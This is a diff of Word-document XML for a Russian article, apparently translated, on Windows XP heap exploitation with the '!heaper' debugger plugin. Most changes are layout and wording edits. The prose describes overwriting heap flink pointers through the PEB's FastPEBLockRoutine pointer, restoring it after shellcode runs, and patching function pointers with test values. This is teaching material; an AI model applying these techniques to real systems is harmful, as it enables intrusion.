+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
       <w:r>
         <w:rPr/>
         <w:t>Напомню, что для получения графа можно использовать команду !heaper af 490000 -g. В этом случае имя по умолчанию будет lal_graph.png. Его можно изменить флагом -f.</w:t>
@@ -2285,7 +2314,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="12">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2310,7 +2339,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2364,7 +2393,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="13">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="12">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2389,7 +2418,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2419,7 +2448,53 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Разумеется 0x43434343 не является указателем на существующий чанк, а нам нужно, чтобы flink указывал на доступную для чтения/записи память. Для этого мы возьмём из PEB указатель на функцию FastPEBLockRoutine, описанный в предыдущей статье. Как сказано в ней же, указатели в PEB рандомизированы, но так как я всего лишь демонстрирую метод, мне нужен просто указатель, по которому можно производить запись. Чтобы получить его значение, воспользуемся командой '!heaper dp -m'. Она покажет нам содержимое управляющей стуктуры PEB. В ней по смещению 0x20 находится указатель на FastPEBLockRoutine.</w:t>
+        <w:t xml:space="preserve">Разумеется 0x43434343 не является указателем на существующий чанк, а нам нужно, чтобы flink указывал на доступную для чтения/записи память. Для этого мы возьмём из PEB указатель на функцию FastPEBLockRoutine, описанный в предыдущей статье. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>Там сказано</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>что</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve"> указатели в PEB рандомизированы, но так как я всего лишь демонстрирую метод, мне нужен просто </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">доступный для записи </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">указатель. Чтобы получить его значение, воспользуемся командой '!heaper dp -m'. Она покажет нам содержимое управляющей стуктуры PEB. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>П</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>о смещению 0x20 находится указатель на FastPEBLockRoutine.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2443,7 +2518,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="14">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="13">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2468,7 +2543,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2522,7 +2597,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="15">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="14">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2547,7 +2622,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId15"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2583,17 +2658,26 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:bidi w:val="0"/>
+        <w:ind w:left="720" w:hanging="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2606,6 +2690,26 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:bidi w:val="0"/>
+        <w:ind w:left="720" w:hanging="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2618,17 +2722,26 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:bidi w:val="0"/>
+        <w:ind w:left="720" w:hanging="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2641,7 +2754,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:bidi w:val="0"/>
+        <w:ind w:left="720" w:hanging="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
       </w:pPr>
@@ -2659,7 +2777,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="16">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="15">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>0</wp:posOffset>
@@ -2684,7 +2802,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2731,7 +2849,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2744,7 +2862,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2757,7 +2875,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2770,19 +2888,19 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2795,7 +2913,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2808,7 +2926,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2821,7 +2939,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2834,7 +2952,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2847,7 +2965,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2860,19 +2978,19 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -2903,7 +3021,30 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Таким образом указатель будет восстановлен, и шеллкод не будет вызываться бесконечно. Конечно, в Windows XP SP3 это всё должно делаться динамически, если адрес PEB был подобран перебором. Я оставлю сообразительному читателю расширение ассемблерной заготовки выше до работы с динамическим PEB и правкой смещения 0x20. Вы может использовать fs:[0x30].</w:t>
+        <w:t xml:space="preserve">Таким образом указатель будет восстановлен, и шеллкод не будет вызываться бесконечно. Конечно, в Windows XP SP3 это всё должно </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>производиться</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve"> динамически, если адрес PEB был подобран перебором. Я оставлю сообразительному читателю расширение </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">этой </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>ассемблерной заготовки до работы с динамическим PEB и правкой смещения 0x20. Вы может использовать fs:[0x30].</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2923,7 +3064,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr>
@@ -2940,7 +3081,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr>
@@ -2957,7 +3098,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr>
@@ -2974,12 +3115,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
-        </w:rPr>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2991,46 +3130,49 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Если в следующий раз захотим эксплуатировать приложение одной командой, она будет выглядеть так (предполагается, что мы передаём данные по сокету):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Если </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">мы </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>в следующий раз захотим эксплуатировать приложение одной командой, она будет выглядеть так (предполагается, что мы передаём данные по сокету):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -3100,6 +3242,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -3112,6 +3258,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -3124,6 +3274,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -3136,6 +3290,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -3217,7 +3375,47 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>В настоящий момент, плане не использует эвристические проверки, однако они появятся в ближайшем будущем. Пока он ли проверяет возможность перезаписи указателей flink/blink, а также было ли поле размера чанка в заголовке перезаписано. В течение ближайших месяцев появитя поддержка Windows 7. Пока я провожу анализ возможных эксплуатаций и требуемых для них условий.</w:t>
+        <w:t>В настоящий момент, пла</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>гин</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve"> не использует эвристические проверки, однако они появятся в ближайшем будущем. Пока он ли</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>шь</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve"> проверяет возможность перезаписи указателей flink/blink, а также было ли перезаписано поле заголовк</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">а, содержащее </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>размер чанк</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>. В течение ближайших месяцев появит</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>я поддержка Windows 7. Пока я провожу анализ возможных эксплуатаций и требуемых для них условий.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3264,7 +3462,7 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="17">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="16">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>527685</wp:posOffset>
@@ -3274,7 +3472,7 @@
             </wp:positionV>
             <wp:extent cx="5276850" cy="1990725"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapSquare wrapText="largest"/>
+            <wp:wrapTopAndBottom/>
             <wp:docPr id="16" name="Image16" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -3289,7 +3487,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3319,7 +3517,34 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Я уже отмечал, что поиск указателя, который можно будет перезаписать, непростая задача. Более того, вам нужно будет убедиться, что найденный указатель будет вызван после нашего переполнения. !heaper поможет нам решить эту проблему.</w:t>
+        <w:t xml:space="preserve">Я уже отмечал, что </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">не так то просто </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">найти </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>указател</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>ь</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>, который можно будет перезаписать. Более того, вам нужно будет убедиться, что найденный указатель будет вызван после нашего переполнения. !heaper поможет нам решить эту проблему.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3354,166 +3579,65 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Чтобы пропатчить указатель на функцию значением по умолчанию 0x41414141 введите команду '!heaper dfp -p &lt;указатель на функцию&gt;'. Чтобы пропатчить их [все]: '!heaper dfp -p all'.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Можно также восстановить исходное значение командами '!heaper -r &lt;указатель на функцию&gt;' и '!heaper -r all'.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="18">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
-            </wp:positionV>
-            <wp:extent cx="6332220" cy="5544820"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapTopAndBottom/>
-            <wp:docPr id="17" name="Image17" descr=""/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="17" name="Image17" descr=""/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="6332220" cy="5544820"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:anchor>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Чтобы пропатчить указатель на функцию значением по умолчанию 0x41414141 введите команду '!heaper dfp -p &lt;указатель на функцию&gt;'. Чтобы пропатчить их [все]: '!heaper dfp -p all'.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="19">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
-            </wp:positionV>
-            <wp:extent cx="6332220" cy="5633085"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapTopAndBottom/>
-            <wp:docPr id="18" name="Image18" descr=""/>
